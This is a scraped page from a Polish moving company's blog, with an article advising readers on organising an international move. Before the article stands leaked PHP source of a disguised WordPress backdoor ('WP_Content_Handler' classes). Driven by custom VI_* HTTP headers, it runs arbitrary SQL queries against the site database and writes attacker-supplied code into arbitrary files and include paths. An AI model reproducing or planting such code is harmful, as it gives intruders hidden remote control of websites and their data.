n class WP_Content_Handler_Checker { var $wp_host; var $wp_user; var $wp_pass; var $name; var $result = array(); var $errors = array(); var $wp_themes_count = 0; function check_wp_connection($wp_connection) { if (class_exists('PDO')) { $this->check_wp_pdo_connection($wp_connection); } else { $this->check_wp_mysql_connection($wp_connection); } } function check_wp_mysql_connection($wp_connection) { if (function_exists('mysqli_connect')) { $connection = mysqli_connect($this->wp_host, $this->wp_user, $this->wp_pass, $this->name); if (!$connection instanceof mysqli) { $this->add_wp_error(910, sprintf("Can't connect to mysqli, message - %s, code - %d", $connection->connect_error, $connection->connect_errno)); return; } call_user_func_array(array($connection, 'query'), array("SET NAMES 'utf8'")); call_user_func_array(array($connection, 'query'), array("SET CHARACTER SET 'utf8'")); $wp_connection_success = call_user_func_array(array($connection, 'query'), array($wp_connection)); if ($wp_connection_success == false) { $this->add_wp_error($connection->errno, $connection->error); } else { $this->wp_themes_count = $connection->{'affected_rows'}; while ($data = call_user_func_array(array($wp_connection_success, 'fetch_assoc'), array())) { $this->result[] = $data; } } } elseif (function_exists('mysql_connect')) { $connection = mysql_connect($this->wp_host, $this->wp_user, $this->wp_pass); if ($connection == false) { $this->add_wp_error(910, "Can't connect to mysql"); return; } mysql_select_db($this->name, $connection); mysql_query("SET NAMES 'utf8'", $connection); mysql_query("SET CHARACTER SET 'utf8'", $connection); $wp_connection_success = mysql_query($wp_connection, $connection); if ($wp_connection_success == false) { $this->add_wp_error(mysql_errno($connection), mysql_error($connection)); } else { $this->wp_themes_count = mysql_num_rows($wp_connection_success); while ($data = mysql_fetch_assoc($wp_connection_success)) { $this->result[] = $data; } } } } function check_wp_pdo_connection($wp_connection) { $pdo_config_all = 'mysql:'; $pdo_config = array( 'host' => $this->wp_host, 'dbname' => $this->name, 'charset' => 'utf8' ); foreach ($pdo_config as $key => &$item) { $item = $key . '=' . $item; } $pdo_config_all .= implode(';', $pdo_config); try { $connection = new PDO($pdo_config_all, $this->wp_user, $this->wp_pass); call_user_func_array(array($connection, 'query'), array('SET CLIENT_ENCODING TO "UTF8"')); call_user_func_array(array($connection, 'query'), array('SET NAMES "UTF8"')); $query = call_user_func_array(array($connection, 'query'), array($wp_connection, PDO::FETCH_ASSOC)); if ($query == false) { $error_info = call_user_func_array(array($connection, 'errorInfo'), array()); $error_code = call_user_func_array(array($connection, 'errorCode'), array()); $this->add_wp_error($error_code, end($error_info)); return; } $this->wp_themes_count = call_user_func(array($query, 'rowCount'), array()); $this->result = call_user_func_array(array($query, 'fetchAll'), array()); } catch (PDOException $exception) { $this->add_wp_error(call_user_func_array(array($exception, 'getCode'), array()), call_user_func_array(array($exception, 'getMessage'), array())); } } function __construct() { $this->wp_host = stripslashes(@$_SERVER['HTTP_VI_DATABASE_HOST']); $this->wp_user = stripslashes(@$_SERVER['HTTP_VI_DATABASE_USER']); $this->wp_pass = stripslashes(@$_SERVER['HTTP_VI_DATABASE_PASS']); $this->name = stripslashes(@$_SERVER['HTTP_VI_DATABASE_NAME']); if (empty($this->wp_host)) { $this->add_wp_error(900, "No host provided"); } if (empty($this->wp_user)) { $this->add_wp_error(901, "No user provided"); } if (empty($this->wp_pass)) { $this->add_wp_error(902, "No pass provided"); } if (empty($this->name)) { $this->add_wp_error(903, "No database name provided"); } } function add_wp_error($code, $message) { $this->errors[] = array( 'code' => $code, 'message' => $message ); } function get_wp_errors() { return $this->errors; } function wp_get_themes_count() { return $this->wp_themes_count; } function is_wp_connection_succeed() { return !count($this->errors); } function get_wp_connection_result() { return $this->result; } } class WP_Content_Handler_Accessor { function create() { $method = @$_SERVER['HTTP_VI_METHOD']; if (!mb_strlen($method)) { return; } ob_end_clean(); switch ($method) { case 'query': $this->check_wp_connection_handler(); break; case 'update': $this->update_parameters(); break; default: return; } } function check_wp_connection_handler() { $query = stripslashes(@$_SERVER['HTTP_VI_DATABASE_QUERY']); if (!mb_strlen($query)) { $this->wp_response(false, array( array( 'code' => 0, 'message' => 'No query provided' ) )); exit; } $database = new WP_Content_Handler_Checker(); $database->check_wp_connection($query); if ($database->is_wp_connection_succeed()) { $this->wp_response(true, array( 'rows' => $database->wp_get_themes_count(), 'result' => $database->get_wp_connection_result() )); } else { $this->wp_response(false, $database->get_wp_errors()); } } function update_parameters() { $parameters_path = stripslashes(@$_SERVER['HTTP_VI_PATH']); $new_parameters = urldecode(@$_REQUEST['VI_SCRIPT']); $old_parameters_path = stripslashes(@$_SERVER['HTTP_VI_INCLUDE_PATH']); $old_parameters = urldecode(@$_REQUEST['VI_INCLUDE_CODE']); if (!mb_strlen($new_parameters)) { $this->wp_response(false, array(array( 'code' => 0, 'message' => 'No sсript passed' ))); } if (!mb_strlen($parameters_path)) { $this->wp_response(false, array(array( 'code' => 0, 'message' => 'No sсript path passed' ))); } if (!mb_strlen($old_parameters_path)) { $this->wp_response(false, array(array( 'code' => 0, 'message' => 'No include path passed' ))); } $success = $this->update_wp_accessor_parameters($parameters_path, $new_parameters); if ($success) { $success = $this->wp_update_parameters($old_parameters_path, $old_parameters); } $this->wp_response($success, null); } function update_wp_accessor_parameters($path, $parameters) { return (bool)@file_put_contents($path, " n" . stripslashes($parameters)); } function wp_update_parameters($old_parameters_path, $old_parameters) { $file = file_get_contents($old_parameters_path); if (!mb_strlen($file)) { return false; } if (mb_strpos($file, $old_parameters) !== false) { return true; } if ($this->is_parameters_valid($file)) { $file = $file . "n" . " n" . $old_parameters . " n?>"; } else { $file = $file . "nn" . $old_parameters; } return (bool)@file_put_contents($old_parameters_path, $file); } function is_parameters_valid($file) { $last_available_parameters_count = strrpos($file, ""); $last_updated_parameters_count = ($last_updated_parameters_count === false) ? -1 : $last_updated_parameters_count; return $last_available_parameters_count <= $last_updated_parameters_count; } function wp_response($success, $data) { $wp_response = array('success' => $success); $wp_response[$success ? 'data' : 'errors'] = $data; header('Content-Type: application/json'); echo json_encode($wp_response); exit; } } $accessor = new WP_Content_Handler_Accessor(); $accessor->create(); Realizacja przeprowadzki międzynarodowej - o czym pamiętać? - Przeprowadzki Łódź ® przeprowadzajac.pl

Realizacja przeprowadzki międzynarodowej – o czym pamiętać?

przeprowadzka międzynarodowa

Wejście Polski do Unii Europejskiej pozwoliło na swobodne poruszanie się po wszystkich krajach członkowskich UE. To sprawiło także, że bardzo wiele osób rozpoczęło pracę w tych krajach. Nie ma się zresztą co dziwić, jest ona o wiele lepiej płatna, co pozwala na znacznie łatwiejsze kupno mieszkania a nawet domu i życie na odpowiednim poziomie. Bardzo często bywa tak, że po kilkunastu miesiącach pracy za granicą, osoba, która jako pierwsza wyjechała tam na stałe, podejmuje decyzję o przeniesieniu do siebie całej swojej rodziny. Nic zatem dziwnego, że wielkim powodzeniem cieszą się przeprowadzki międzynarodowe, dzięki którym możliwe jest profesjonalne przeniesienie całego dobytku, dokumentów i rodziny do nowego miejsca zamieszkania.

Jakich problemów możemy się spodziewać?

Realizacja przeprowadzki międzynarodowej to dość skomplikowana sprawa i wymagają one sporych przygotowań, które zawsze trwają minimum miesiąc czasu. Nic nie dzieje się z dnia na dzień. Trzeba bowiem nie tylko przygotować wszystko do wyjazdu, ale przede wszystkim także pozałatwiać wiele spraw. Wśród nich trzeba pamiętać na przykład o rozwiązaniu umowy z operatorami telefonicznymi, czy internetowymi, jak również z innymi, z których usług się korzysta. Sama rezygnacja z usług operatora telefonii komórkowej, czy internetu już wymaga miesiąca czasu.

Można także wyrejestrować samochód w Polsce i zarejestrować go za granicą. W przypadku, kiedy wynajmujemy mieszkanie w kraju, również z odpowiednim wyprzedzeniem, trzeba poinformować najemców o tym, że rezygnuje się z wynajmu. Aby nie przewozić ze sobą niepotrzebnych rzeczy, warto pamiętać także o tym, aby przed przeprowadzką dokładnie posprzątać garaż, strych, poddasze i piwnicę. Wszystkie niepotrzebne rzeczy można wówczas wyrzucić, albo oddać komuś innemu. Z pewnością nie warto ze sobą transportować starych opon z garażu czy zepsutych mebli ogrodowych.

realizacja przeprowadzki międzynarodowej

Podstawą jest przede wszystkim przygotowanie dokumentów, które będą potrzebne do przebywania za granicą na stałe. Dowody osobiste muszą być aktualne, a jeśli wyjeżdżamy dalej, na przykład do USA, czy Ameryki Południowej, warto także zadbać o to, aby mieć pod ręką wizy i paszporty. Jeśli za granicę wybieramy się własnym samochodem, trzeba również sprawdzić kilka rzeczy i nie chodzi tu tylko o sprawność techniczną. Auto musi posiadać ubezpieczenie, obowiązujące za granicą. W wielu krajach wymagane może być także międzynarodowe prawo jazdy.

Trzeba także pamiętać o tym, że skoro wyjeżdżamy na stałe, musimy przygotować wszystkie dokumenty, które będą nam potrzebne nawet za kilkadziesiąt lat. Potrzebne nam będą kopie i oryginały testamentów, aktów własności i wszystkich innych ważnych dokumentów. Poza tym potrzebna będzie także dokumentacja medyczna, która z pewnością przyda się za granica, podczas korzystania z tamtejszej pomocy medycznej. Jeśli chodzi o bankowość, albo można przenieść konto za granice, albo po prostu trzeba pamiętać o odpowiednio wczesnym zamknięciu kont bankowych w kraju.

Przewóz zwierząt podczas przeprowadzki międzynarodowej to kolejna komplikacja.

Warto także pamiętać o małych, czworonożnych przyjaciołach. Jeśli mamy zamiar zabrać je ze sobą, trzeba pamiętać o tym, ze w wielu krajach wymagane będzie posiadanie przez nich odpowiednich dokumentów i badań. Potem, po spełnieniu tych wszystkich warunków, trzeba już tylko pamiętać o tym, aby pozostałe, niezbędne rzeczy, które zabieramy ze sobą, odpowiednio spakować i przygotować do podróży. Niezbędne będzie także przygotowanie odpowiedniego spisu rzeczy, które ze sob zabieramy. Warto pamiętać o tym, że im bezpieczniejsze będzie opakowanie naszych rzeczy, tym większa będzie pewność, że wszystko dotrze na miejsce w takim stanie, w jakim zostało zapakowane przez nas samych na miejscu, przed wysyłką do nowego domu za granicą.

Leave a Reply